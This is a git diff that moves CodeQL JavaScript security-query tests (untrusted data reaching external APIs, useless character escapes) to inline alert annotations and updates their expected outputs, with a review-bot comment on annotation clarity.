diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected index 60423f3d6677..de528b8bde2e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.expected 
@@ -1,3 +1,16 @@ +#select +| tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | Call to external-lib() [param 0] with untrusted data from $@. 
| tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | Call to external-lib() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | Call to external-lib.get.[callback].[param 'res'].send() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | Call to external-lib.get.[callback].[param 'req'].app.locals.something.foo() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | Call to lodash.merge() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... 
usted\\n} | Call to lodash.merge() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | edges | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | provenance | | | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | provenance | | 
@@ -16,15 +29,15 @@ edges | tst-UntrustedDataToExternalAPI.js:10:19:10:27 | untrusted | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | provenance | | | tst-UntrustedDataToExternalAPI.js:14:12:16:9 | {\\n ... } [z] | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | provenance | | | tst-UntrustedDataToExternalAPI.js:15:16:15:24 | untrusted | tst-UntrustedDataToExternalAPI.js:14:12:16:9 | {\\n ... } [z] | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | -| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | provenance | | -| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | provenance | | -| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | provenance | | -| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... 
usted\\n} [y] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | provenance | | +| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | provenance | | +| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | provenance | | +| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | provenance | | +| tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | provenance | | nodes | tst-UntrustedDataToExternalAPI.js:3:5:3:27 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | semmle.label | window.name | 
@@ -42,24 +55,11 @@ nodes | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | semmle.label | {} | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | semmle.label | {\\n x ... usted\\n} | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [x] | semmle.label | {\\n x ... usted\\n} [x] | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [y] | semmle.label | {\\n x ... usted\\n} [y] | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} [z] | semmle.label | {\\n x ... usted\\n} [z] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} | semmle.label | { // $ ... usted\\n} | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [x] | semmle.label | { // $ ... usted\\n} [x] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [y] | semmle.label | { // $ ... usted\\n} [y] | +| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | { // $ ... usted\\n} [z] | semmle.label | { // $ ... usted\\n} [z] | | tst-UntrustedDataToExternalAPI.js:42:8:42:16 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:43:8:43:16 | untrusted | semmle.label | untrusted | | tst-UntrustedDataToExternalAPI.js:44:8:44:16 | untrusted | semmle.label | untrusted | subpaths -#select -| tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:5:13:5:21 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. 
| tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:6:17:6:25 | untrusted | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:7:16:7:24 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:8:31:8:39 | untrusted | Call to external-lib() [param *] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:9:18:9:26 | untrusted | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:10:13:10:33 | ['x', u ... d, 'y'] | Call to external-lib() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:11:20:11:28 | untrusted | Call to external-lib() [param 1] with untrusted data from $@. 
| tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:13:8:17:5 | {\\n ... }\\n } | Call to external-lib() [param 0 'x'] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:33:14:33:22 | untrusted | Call to external-lib.get.[callback].[param 'res'].send() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:34:34:34:42 | untrusted | Call to external-lib.get.[callback].[param 'req'].app.locals.something.foo() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:7:41:8 | {} | Call to lodash.merge() [param 0] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | -| tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | tst-UntrustedDataToExternalAPI.js:41:11:45:1 | {\\n x ... usted\\n} | Call to lodash.merge() [param 1] with untrusted data from $@. | tst-UntrustedDataToExternalAPI.js:3:17:3:27 | window.name | window.name | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref index 7752378db17d..72cf5459b163 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/UntrustedDataToExternalAPI.qlref @@ -1 +1,2 @@ -Security/CWE-020/UntrustedDataToExternalAPI.ql +query: Security/CWE-020/UntrustedDataToExternalAPI.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js index 864b2b68a01c..ece90af5215c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/UntrustedDataToExternalAPI/tst-UntrustedDataToExternalAPI.js @@ -1,20 +1,20 @@ let externalLib = require('external-lib'); -let untrusted = window.name; +let untrusted = window.name; // $ Source -externalLib(untrusted); -externalLib({x: untrusted}); -externalLib(...untrusted); -externalLib(...window.CONFIG, untrusted); -externalLib({ ...untrusted }); -externalLib(['x', untrusted, 'y']); -externalLib('foo', untrusted); +externalLib(untrusted); // $ Alert +externalLib({x: untrusted}); // $ Alert +externalLib(...untrusted); // $ Alert +externalLib(...window.CONFIG, untrusted); // $ Alert +externalLib({ ...untrusted }); // $ Alert +externalLib(['x', untrusted, 'y']); // $ Alert +externalLib('foo', untrusted); // $ Alert externalLib({ x: { y: { z: untrusted } - } + } // $ Alert }); function getDeepUntrusted() { 
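Review bot: The markers on multi-line arguments (`} // $ Alert` on the nested object here, and `merge({}, { // $ Alert` plus `}); // $ Alert` in the next hunk) do not say which argument each one covers. According to the updated .expected file, the two `merge` alerts are for param 0 (`{}`) and param 1 (the object literal), so a suffix like the ones used elsewhere in this change would make that readable: `merge({}, { // $ Alert - param 0, the destination object` and `}); // $ Alert - param 1, the object literal`. Putting the comment inside the literal also changes the node text recorded in .expected (`{ // $ ... usted\n}`), which ties that output to the wording of the annotation. `getDeepUntrusted` continues outside this hunk.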
@@ -30,16 +30,16 @@ function getDeepUntrusted() { externalLib(getDeepUntrusted()); externalLib.get('/foo', (req, res) => { - res.send(untrusted); - req.app.locals.something.foo(untrusted); + res.send(untrusted); // $ Alert + req.app.locals.something.foo(untrusted); // $ Alert }); let jsonSafeParse = require('json-safe-parse'); jsonSafeParse(untrusted); // no need to report; has known taint step let merge = require('lodash.merge'); -merge({}, { +merge({}, { // $ Alert x: untrusted, // should not be treated as individual named parameters y: untrusted, z: untrusted -}); +}); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected index 6cd6e27b0edc..b3c764e85cbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected +++ b/javascript/ql/test/query-tests/Security/CWE-020/UselessCharacterEscape/UselessCharacterEscape.expected 
@@ -1,59 +1,59 @@ -| tst-escapes.js:19:8:19:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | -| tst-escapes.js:20:1:20:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... 
\\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\T' is equivalent to just 'T'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\U' is equivalent to just 'U'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\V' is equivalent to just 'V'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\X' is equivalent to just 'X'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Y' is equivalent to just 'Y'. | -| tst-escapes.js:21:1:21:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Z' is equivalent to just 'Z'. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... 
\\0\\-\\=/ | The escape sequence '\\=' is equivalent to just '='. | -| tst-escapes.js:22:1:22:28 | /\\`\\1\\2 ... \\0\\-\\=/ | The escape sequence '\\`' is equivalent to just '`'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\!' is equivalent to just '!'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\#' is equivalent to just '#'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\%' is equivalent to just '%'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\&' is equivalent to just '&'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\@' is equivalent to just '@'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\_' is equivalent to just '_'. | -| tst-escapes.js:23:1:23:28 | /\\~\\!\\@ ... \\)\\_\\+/ | The escape sequence '\\~' is equivalent to just '~'. | -| tst-escapes.js:24:1:24:15 | /\\[\\]\\'\\\\,\\.\\// | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\<' is equivalent to just '<'. | -| tst-escapes.js:25:1:25:16 | /\\{\\}\\"\\\|\\<\\>\\?/ | The escape sequence '\\>' is equivalent to just '>'. | -| tst-escapes.js:26:1:26:4 | /\\ / | The escape sequence '\\ ' is equivalent to just ' '. | -| tst-escapes.js:29:8:29:11 | "\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:31:8:31:13 | "\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:33:8:33:15 | "\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:35:8:35:17 | "\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. 
| -| tst-escapes.js:37:8:37:19 | "\\\\\\\\\\\\\\\\\\a" | The escape sequence '\\a' is equivalent to just 'a'. | -| tst-escapes.js:42:1:42:4 | "\\." | The escape sequence '\\.' is equivalent to just '.'. | -| tst-escapes.js:48:8:48:15 | "'\\'\\\\'" | The escape sequence '\\'' is equivalent to just '''. | -| tst-escapes.js:50:8:50:15 | '"\\"\\\\"' | The escape sequence '\\"' is equivalent to just '"'. | -| tst-escapes.js:66:8:66:13 | "\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:67:8:67:14 | "x\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | -| tst-escapes.js:71:8:71:17 | "\\\\\\\\\\\\\\]" | The escape sequence '\\]' is equivalent to just ']'. | +| tst-escapes.js:17:8:17:11 | "\\ " | The escape sequence '\\ ' is equivalent to just ' '. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\a' is equivalent to just 'a'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\e' is equivalent to just 'e'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\g' is equivalent to just 'g'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\h' is equivalent to just 'h'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\i' is equivalent to just 'i'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\j' is equivalent to just 'j'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\l' is equivalent to just 'l'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\m' is equivalent to just 'm'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\o' is equivalent to just 'o'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\q' is equivalent to just 'q'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... 
x\\y\\z"/ | The escape sequence '\\y' is equivalent to just 'y'. | +| tst-escapes.js:18:1:18:54 | /\\a\\b\\c ... x\\y\\z"/ | The escape sequence '\\z' is equivalent to just 'z'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\A' is equivalent to just 'A'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\C' is equivalent to just 'C'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\E' is equivalent to just 'E'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\F' is equivalent to just 'F'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\G' is equivalent to just 'G'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\H' is equivalent to just 'H'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\I' is equivalent to just 'I'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\J' is equivalent to just 'J'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\K' is equivalent to just 'K'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\L' is equivalent to just 'L'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\M' is equivalent to just 'M'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\N' is equivalent to just 'N'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\O' is equivalent to just 'O'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\Q' is equivalent to just 'Q'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... \\X\\Y\\Z/ | The escape sequence '\\R' is equivalent to just 'R'. | +| tst-escapes.js:19:1:19:52 | /\\A\\B\\C ... 
